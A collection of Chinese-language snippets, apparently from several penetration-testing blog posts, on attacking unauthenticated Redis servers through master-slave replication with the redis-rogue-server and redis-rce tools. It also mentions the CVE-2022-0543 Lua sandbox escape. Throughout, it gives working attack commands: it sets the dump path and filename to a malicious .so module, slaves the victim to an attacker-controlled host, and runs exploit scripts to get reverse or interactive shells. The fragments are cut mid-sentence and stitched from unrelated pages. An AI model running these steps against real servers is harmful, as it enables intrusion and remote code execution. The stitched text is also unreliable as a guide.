反弹shell主机(kail):192.168.230.128 3.通过redis_rogue_server.py 文件,在xxx.xxx.29.133上起redis服务进行监听(伪造主机)默认15000端口可更改 4. 从机:未授权redis服务器--受害机 config set dir /tmp(配置一个可读可写可执行的导出路径) 5. config set dbfilename module.so 配置导出的文件名 6.slaveof ...
5.4.1 首先使用恶意服务器充当主机,使用FULLRESYNC功能将so文件送给从机 python3 redis-rogue-server_5.py--rhost 172.17.0.3 --rport 6379 --lhost 172.17.0.1 --lport 6381TARGET172.17.0.3:6379SERVER172.17.0.1:6381[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$10\r\n172.17.0.1\r\n$4\r\n6381\r\n...
这个工具里少一个exp.so的文件,我们还需要去上面那个到 redis-rogue-server 工具中找到exp.so文件并复制到redis-rce.py同一目录下,然后执行如下命令即可: python3 redis-rce.py -r rhost -lhost lhost -f exp.so -a password 例: python3 redis-rce.py -r 192.168.33.134 -L 192.168.33.131 -f exp.s...
其中2、3步之间为主从复制的关键。 通过redis-rogue-server脚本来查看2、3步之间的操作。 我将一些符号进行去除,最后得到这些内容。 其中主要的操作为: 主节点会向从节点发送PING命令,这个PING命令的作用,主要是为了让从节点进行超时判断 从服务器将执行命令REPLCONF listening-port 6379,向主服务器发送从服务器的监...
exp用这个https://github.com/n0b0dyCN/redis-rogue-server.git git clone https://github.com/n0b0dyCN/redis-rogue-server.git python3 redis-rogue-server.py --rhost 192.168.0.13 --lhost 192.168.0.139 # rhost是redis,lhost是kali 这执行的时候会遇到错误: ...
https://github.com/n0b0dyCN/redis-rogue-server(需要利用这里面的exp.so) 首先来看redis-ssrf中的ssrf-redis.py脚本: 如上图所示,通过选择不同的mode选项可以选择不同的攻击方式。这里我们选择mode 3,通过主从复制在目标主机上执行命令。需要修改一下几个地方: ...
脚本地址:https://github.com/n0b0dyCN/redis-rogue-server 使用方式:python3 redis-rogue-server.py --rhost rhost --lhost lhost 这里来简单分析一下大佬的思路。这种利用方式首先要创建一个恶意redis服务器来作为master,该master服务器要能够回应连接他的slave 服务的响应。
python redis-rogue-server.py --rhost 192.168.52.251 --lhost 192.168.52.128 --lport 4444 1. 2. 3. 4. 5. 6. 权限可真低,能用的命令也少 5. CVE-2022-0543:redis沙盒逃逸漏洞 造成redis沙盒逃逸漏洞的原因主要是由于redis lua,redis嵌入了lua编程语言作为其脚本引擎,可通过eval命令使用lua,lua引擎是...
使用方法: python3 redis-rogue-server.py --rhost 192.168.43.82 --lhost 192.168.43.247# python3 redis-rogue-server.py --rhost rhost --lhost lhost 执行后,可以选择获得一个交互式的shell(interactive shell)或者是反弹shell(reserve shell): ...
python RogueServer.py --lport 1234 --exp exp.so 2、通过未授权访问连入要攻击的redis服务器。 执行相关命令: #设置redis的备份路径为当前目录 config set dir ./ #设置备份文件名为exp.so,默认为dump.rdb config set dbfilename exp.so #设置主服务器IP和端口 ...